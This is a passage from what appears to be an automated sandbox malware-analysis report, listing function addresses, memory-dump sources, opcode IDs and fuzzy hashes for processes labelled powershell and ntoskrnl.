                                                                                • Instruction Fuzzy Hash: 52E01A31B0C8088FDA78DB4CE0519A973E2EB9D32171601BBD14EC7571CA22ED518B80

                                                                                Non-executed Functions

                                                                                Function 00007FFD9B778BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                • API String ID: 0-962139525
                                                                                • Opcode ID: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
                                                                                • Instruction ID: d8f2d668ba550f6bb5f90de6853ea059a4e98626e5724acab21802a74eecdc5f
                                                                                • Opcode Fuzzy Hash: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
                                                                                • Instruction Fuzzy Hash: A021D477B445258ED30636ADB8519EC7781DF6437938A03F3F029CF193EE18A48B8A81

                                                                                Executed Functions

                                                                                Function 00007FFD9B761709 Relevance: .9, Instructions: 892COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d5326ccee74dcfbd2eb472fc934364e188481198597022111ec3df0817b53b72
                                                                                • Instruction ID: 65f6f2d2dcbb4ef8984bcf2ac0e9dc9085c17e53773add8de79cea89cdebb0f7
                                                                                • Opcode Fuzzy Hash: d5326ccee74dcfbd2eb472fc934364e188481198597022111ec3df0817b53b72
                                                                                • Instruction Fuzzy Hash: 1B52ED65F19A494FE798EB784479BBD77D2FF98300F5406B9E04EC32E6DE2868018742
                                                                                Function 00007FFD9B7621C1 Relevance: .2, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ccedf42e0e3328675ff3ce0d3914983024d27f2c2a8f4576d52cf63e86438b95
                                                                                • Instruction ID: 119b7883ba6ffef27a1c72f03c0c5c5565a99660cee11c4b01bc2eb826b5fc8b
                                                                                • Opcode Fuzzy Hash: ccedf42e0e3328675ff3ce0d3914983024d27f2c2a8f4576d52cf63e86438b95
                                                                                • Instruction Fuzzy Hash: 2F51FB10A1E6C98FD79AABB848746657FE4DF87219B0901FBE099C61EBDD085906C342
                                                                                Function 00007FFD9B761305 Relevance: .5, Instructions: 455COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 605164989c4f8253f09876456fe87f6b7c020462ba9b903f6811abba13c47402
                                                                                • Instruction ID: d02970f1b2bfe042537652aa6e532ba6904719f37f9aa6952ff91b749091e840
                                                                                • Opcode Fuzzy Hash: 605164989c4f8253f09876456fe87f6b7c020462ba9b903f6811abba13c47402
                                                                                • Instruction Fuzzy Hash: 40412436E0EA8A4FD715EBA894751ED7BB1EF91210B0402FBD09ACA5F3DD2829458351
                                                                                Function 00007FFD9B761370 Relevance: .4, Instructions: 411COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50bcb7f87f5f7b86c12606bd7d805c681da2a2855d1d186f47fbfca01be837b4
                                                                                • Instruction ID: 9b95e37ce45bf8292f443afa76891741e98c64d1e5c2083d4055f618937aef13
                                                                                • Opcode Fuzzy Hash: 50bcb7f87f5f7b86c12606bd7d805c681da2a2855d1d186f47fbfca01be837b4
                                                                                • Instruction Fuzzy Hash: B2310122A09A8E4FDB559BA8C8791ED7BB1EFA4240F0402BBC04AD36F2DD2829058341
                                                                                Function 00007FFD9B760E7E Relevance: .2, Instructions: 179COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7243a80b4d02983903ebbcc3e3fd2f5184ac1770cd22e16b3c51fde26e481b2e
                                                                                • Instruction ID: 8787d22e8c953afce32f6675c552a24bb5f7023ba4e12f248938b59f69309215
                                                                                • Opcode Fuzzy Hash: 7243a80b4d02983903ebbcc3e3fd2f5184ac1770cd22e16b3c51fde26e481b2e
                                                                                • Instruction Fuzzy Hash: E5512921B0E68A0FE356A77C48656B53BE1DF8621474901FBD08DC71EBDC1C9C438352
                                                                                Function 00007FFD9B7607F2 Relevance: .2, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eb8c95e46903a53f2c6b3a618a0146fc02bc95c68e7f8f4483d95750dccb1215
                                                                                • Instruction ID: 3ad9f8253e59f12783a1ce8a772054ae3cb5d948fa1063a76bc4cdda14329a6a
                                                                                • Opcode Fuzzy Hash: eb8c95e46903a53f2c6b3a618a0146fc02bc95c68e7f8f4483d95750dccb1215
                                                                                • Instruction Fuzzy Hash: CF51293AB4969A8FD304EB6CA0F19ED3BA1EFD0214B5045F6E04DC73DBDD2864458B91
                                                                                Function 00007FFD9B760B87 Relevance: .2, Instructions: 164COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a71f0f460db0957b20e568723693a37572d9d08325c1e81aab85f68a0f63c6c
                                                                                • Instruction ID: ab3b92594c63996e1dc0eec5cf56f6fb0ef0cd282c1bf235de9f550e788600de
                                                                                • Opcode Fuzzy Hash: 3a71f0f460db0957b20e568723693a37572d9d08325c1e81aab85f68a0f63c6c
                                                                                • Instruction Fuzzy Hash: EF513736B09A5E8FDB44EBB8D8616ED77E1FFD4310B5005BAD00DC72D6CE28A8468780
                                                                                Function 00007FFD9B760668 Relevance: .1, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 16d803f37e2b0a7abc4b4d825329fe5da77fc026e25c71f6b8cfed04ed1594ac
                                                                                • Instruction ID: bc082ef55ed239aa799e5ff134af9df832aec3300919967fe40f050942be4c1c
                                                                                • Opcode Fuzzy Hash: 16d803f37e2b0a7abc4b4d825329fe5da77fc026e25c71f6b8cfed04ed1594ac
                                                                                • Instruction Fuzzy Hash: EF31A021B1C9494FE798EB6C886A779B6C2EFD9315F0501BAA04EC32EBDD64AC418341
                                                                                Function 00007FFD9B760D19 Relevance: .1, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
                                                                                • Instruction ID: d0906da9b39b0cab91528258c5f228e1e77b1464a7a356e435750e707c5741fd
                                                                                • Opcode Fuzzy Hash: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
                                                                                • Instruction Fuzzy Hash: 2431F615B18A094FE794BBBC58697BDB6D2EFD8711F1402BAE00DC32DBDE286D414382
                                                                                Function 00007FFD9B762391 Relevance: .1, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a5febea80853cb0bebaf20adc2948a677a907d286376b520b1a14b5f09f882d4
                                                                                • Instruction ID: 0401ff744aa072e0f8388b6e1424d5b6558c81a48fb310f84f72af9fc964aa24
                                                                                • Opcode Fuzzy Hash: a5febea80853cb0bebaf20adc2948a677a907d286376b520b1a14b5f09f882d4
                                                                                • Instruction Fuzzy Hash: AE214621F0DB894FE791AB6CA861534BBD0DF8A215B0906F7E48CC71F7ED14AD418382

                                                                                Executed Functions

                                                                                Function 00007FFD9B761709 Relevance: .9, Instructions: 892COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cbf85433e7f43fc377c7f1d8270a35da6514ca75ac24a3f2b5d49b3a850684f9
                                                                                • Instruction ID: a5bcc22570f461ac3e2f755ef2d6f7f2835706f458def25e704ebb8e38d06b67
                                                                                • Opcode Fuzzy Hash: cbf85433e7f43fc377c7f1d8270a35da6514ca75ac24a3f2b5d49b3a850684f9
                                                                                • Instruction Fuzzy Hash: 9A52BB25F19E494FE758EB788479ABD77D2FF98300F450679E05EC32E6DE28A8018742
                                                                                Function 00007FFD9B7621C1 Relevance: .2, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e3a2a7e17a77317f58908fdce704dd6a06a6a977e568ef541cc3d2ab1ca65bc
                                                                                • Instruction ID: d5fe852673e9875f55ad4147a7f1c85a7245d73961fb24168b73b819f69ba91b
                                                                                • Opcode Fuzzy Hash: 0e3a2a7e17a77317f58908fdce704dd6a06a6a977e568ef541cc3d2ab1ca65bc
                                                                                • Instruction Fuzzy Hash: 6A51FB10A1E6C98FD79AABB848746757FE4DF87219B0901FBE099C61EBDD085906C342
                                                                                Function 00007FFD9B761305 Relevance: .5, Instructions: 455COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 129389bb4f7e16549b6bf64cdf2fc8e84befc090d481694fcbe7629b9d360d0d
                                                                                • Instruction ID: e1232efec93e0891275f5f546104fdd5a3fc1c1d7d2d40a7814bc7ddc122c7c7
                                                                                • Opcode Fuzzy Hash: 129389bb4f7e16549b6bf64cdf2fc8e84befc090d481694fcbe7629b9d360d0d
                                                                                • Instruction Fuzzy Hash: 9A413536A0EB4A4FD715EBA894790ED7BB1EF91210B0402BBD09ACB5F3DD2829458351
                                                                                Function 00007FFD9B761370 Relevance: .4, Instructions: 411COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eb63d16e37569ae23694a95ebbc2568685041d7b8a0fcffb37bc02281b0bb1a5
                                                                                • Instruction ID: f0f291d4363406782e21ad50ba418229ffa665410f669840e1864a108ebab0e3
                                                                                • Opcode Fuzzy Hash: eb63d16e37569ae23694a95ebbc2568685041d7b8a0fcffb37bc02281b0bb1a5
                                                                                • Instruction Fuzzy Hash: 6B31E432A09A4E4FDB54DBA8C8791ED7BB1FF94241F0402BAD05AD76F2DD282D05C351
                                                                                Function 00007FFD9B760E7E Relevance: .2, Instructions: 179COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6c6f9f972fcecdbcf9aaf092b7731d6b062a5a8bd79adb24bd91952f0f0cb6a9
                                                                                • Instruction ID: 24a803601049654cd5301410e96364343e29f95020c8707ce9c3545f36a9437a
                                                                                • Opcode Fuzzy Hash: 6c6f9f972fcecdbcf9aaf092b7731d6b062a5a8bd79adb24bd91952f0f0cb6a9
                                                                                • Instruction Fuzzy Hash: D0511921B0EA8A0FE366A77C48656B53BE1DF86214B4941FBD48DC71EBDC189C478352
                                                                                Function 00007FFD9B7607F2 Relevance: .2, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bbad763fdc5b32d6a791eeb21f857fc463d0c6072077ea47772006847ff3052
                                                                                • Instruction ID: a5a43bb2ae3237fccf5a769b469e18a5613e3384b7460f4f5890c03266ec24cf
                                                                                • Opcode Fuzzy Hash: 8bbad763fdc5b32d6a791eeb21f857fc463d0c6072077ea47772006847ff3052
                                                                                • Instruction Fuzzy Hash: 1251293AB49A4A8FD318E76CA0B59FD3BA1EF80614B4045FAE089C73DBDD24A4458791
                                                                                Function 00007FFD9B760B87 Relevance: .2, Instructions: 164COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0afdcce0717322fc5730b6e665a1a172b47001a9ae31792411748a2c28c3c3f
                                                                                • Instruction ID: 3e8bdc0755b4c12a8f95d4115232b7f46770a03eee347ed1988a4e964567eb39
                                                                                • Opcode Fuzzy Hash: a0afdcce0717322fc5730b6e665a1a172b47001a9ae31792411748a2c28c3c3f
                                                                                • Instruction Fuzzy Hash: F5512736B19A1E8FDB44EBB8D8656ED77E1FFD4311F4405BAD009C72D6CE24A8468780
                                                                                Function 00007FFD9B760668 Relevance: .1, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20449972d92f167ef88f5540cfb4d32d62191dfd426f0f95c7fff91aebac3ff6
                                                                                • Instruction ID: 6b26191c3f91c364e8d04b3fefefdae9dfda7fa5a8837659e47f53e123b37521
                                                                                • Opcode Fuzzy Hash: 20449972d92f167ef88f5540cfb4d32d62191dfd426f0f95c7fff91aebac3ff6
                                                                                • Instruction Fuzzy Hash: D431B121B1C94D4FE798EB6C886A779B6C2EFD8315F0501BEA04EC32EBDD64AC418341
                                                                                Function 00007FFD9B760D19 Relevance: .1, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
                                                                                • Instruction ID: d0906da9b39b0cab91528258c5f228e1e77b1464a7a356e435750e707c5741fd
                                                                                • Opcode Fuzzy Hash: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
                                                                                • Instruction Fuzzy Hash: 2431F615B18A094FE794BBBC58697BDB6D2EFD8711F1402BAE00DC32DBDE286D414382
                                                                                Function 00007FFD9B762391 Relevance: .1, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 79a57ecfc6bded54a2c12a5ca4fa3a99829c02392db38b3d7ed89b1c18d77693
                                                                                • Instruction ID: ee083a48bd37ca3dfa871464a2faf5a7c633cfd6ef58a3042916e31d0240eaad
                                                                                • Opcode Fuzzy Hash: 79a57ecfc6bded54a2c12a5ca4fa3a99829c02392db38b3d7ed89b1c18d77693
                                                                                • Instruction Fuzzy Hash: 2F214621B0DB894FE791AB6CA865534BBD0DF8A214B0906F7E489C71F7ED14AD418382

                                                                                Executed Functions

                                                                                Function 00007FFD9B781709 Relevance: 2.1, Strings: 1, Instructions: 881COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: 04f150e50e2ea0365bd974b98928e19542a3af90f1147f8276e65596dc7866fb
                                                                                • Instruction ID: 98c0feddc7ce07cd6deb698d698e54be86566b178fb512a11c45be0531c2a176
                                                                                • Opcode Fuzzy Hash: 04f150e50e2ea0365bd974b98928e19542a3af90f1147f8276e65596dc7866fb
                                                                                • Instruction Fuzzy Hash: C052B821B19A494FE768EB7884B5ABD77D2FF98301F4506BDE01EC32E6DD3868418741
                                                                                Function 00007FFD9B7821C1 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: A
                                                                                • API String ID: 0-3554254475
                                                                                • Opcode ID: a7d80c5e3b7c683340bf5ca2db09c523db0fef244c67c70117f1114ddd8389ab
                                                                                • Instruction ID: 1dc96e6a2b4fb1f8b93809879066630b624778a806f5b506270eb90c185c2b52
                                                                                • Opcode Fuzzy Hash: a7d80c5e3b7c683340bf5ca2db09c523db0fef244c67c70117f1114ddd8389ab
                                                                                • Instruction Fuzzy Hash: 5151FE10B1EAC94FD796ABB848B46657FD4DF8722AB0901FBE09DC71E7DD281906C342
                                                                                Function 00007FFD9B780B87 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: 6a515a7d071262c0a096c6a651e734ba8bd4c4a72d96ad83a46fc8d052fae3fc
                                                                                • Instruction ID: 28e3e9e3385296732e638067020fe344dd8acd93b086b9bedccd344c588413dc
                                                                                • Opcode Fuzzy Hash: 6a515a7d071262c0a096c6a651e734ba8bd4c4a72d96ad83a46fc8d052fae3fc
                                                                                • Instruction Fuzzy Hash: 5F412735B19A1E8FDB44EBB8D865AED77A1FF95311F5402BAD009C32D6CE3864468B80
                                                                                Function 00007FFD9B7807F2 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: 684ee668e9a47a13c95011985f06114fa2609e62c7570513f0643524be0dcc61
                                                                                • Instruction ID: 71f8ada2dbfc26f58be167f44af6e1dfdc8450830f025bcd577239d3cbd8fdf8
                                                                                • Opcode Fuzzy Hash: 684ee668e9a47a13c95011985f06114fa2609e62c7570513f0643524be0dcc61
                                                                                • Instruction Fuzzy Hash: E4514836B595494FD308EB6CE0B19FD3B61EF80315B9542FAE05E873DBDE2864818B80
                                                                                Function 00007FFD9B782391 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: V
                                                                                • API String ID: 0-1342839628
                                                                                • Opcode ID: 14f23b97031294d16da545dd3846cd271c635606ab792a0b211a7985ba4f9a3f
                                                                                • Instruction ID: 347741754c34c1e8c3d1f204562b3db8a785afa2e13db657d4c46e854b344eb4
                                                                                • Opcode Fuzzy Hash: 14f23b97031294d16da545dd3846cd271c635606ab792a0b211a7985ba4f9a3f
                                                                                • Instruction Fuzzy Hash: 5F019E10A1DF850FE756A73858B55757FE0CFC1216B0805FBE888CA0F7E8186A448391
                                                                                Function 00007FFD9B781305 Relevance: .5, Instructions: 455COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 832b3591998e5885a9e1649d026d7a42e07a9898e282c51c0cf90ac6c6de5eb5
                                                                                • Instruction ID: a620555decdd706fcbb18fd0a3cad41e5a2ae2ed08dce8bae8cfda6bf8db40a0
                                                                                • Opcode Fuzzy Hash: 832b3591998e5885a9e1649d026d7a42e07a9898e282c51c0cf90ac6c6de5eb5
                                                                                • Instruction Fuzzy Hash: 0D41B222A0AB4E4FD755ABA898B50FD7BB1EF55211B0902FBD09AC65E3DE2829058740
                                                                                Function 00007FFD9B781370 Relevance: .4, Instructions: 411COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e326f9deb4fc4b8c420ff1b3bb9f398bd55b0302fcd0571ac691bcfdf3df834c
                                                                                • Instruction ID: e83b49ae59e60082e1b5393a5d4a6e3c912370f4bf0336ece38a5575ebda6b7f
                                                                                • Opcode Fuzzy Hash: e326f9deb4fc4b8c420ff1b3bb9f398bd55b0302fcd0571ac691bcfdf3df834c
                                                                                • Instruction Fuzzy Hash: 4931D232B1AA4E4FDB54EBA888B50FDBBB1FF59251F4402FAD05AD36F2DD2429058740
                                                                                Function 00007FFD9B780E7E Relevance: .2, Instructions: 179COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e56fd61cce201dac00687ff76f0058344fd71e13231a19727c836717558ae074
                                                                                • Instruction ID: d64bff0a3ad8633b81b87d66e5186e4442021c9f99f66b0dc98c7a375435c4ff
                                                                                • Opcode Fuzzy Hash: e56fd61cce201dac00687ff76f0058344fd71e13231a19727c836717558ae074
                                                                                • Instruction Fuzzy Hash: 55514721B0EA8A0FE366A77C48665793BE1DF8621570941FBD08CC71EBDD189C438352
                                                                                Function 00007FFD9B780668 Relevance: .1, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
                                                                                Similarity
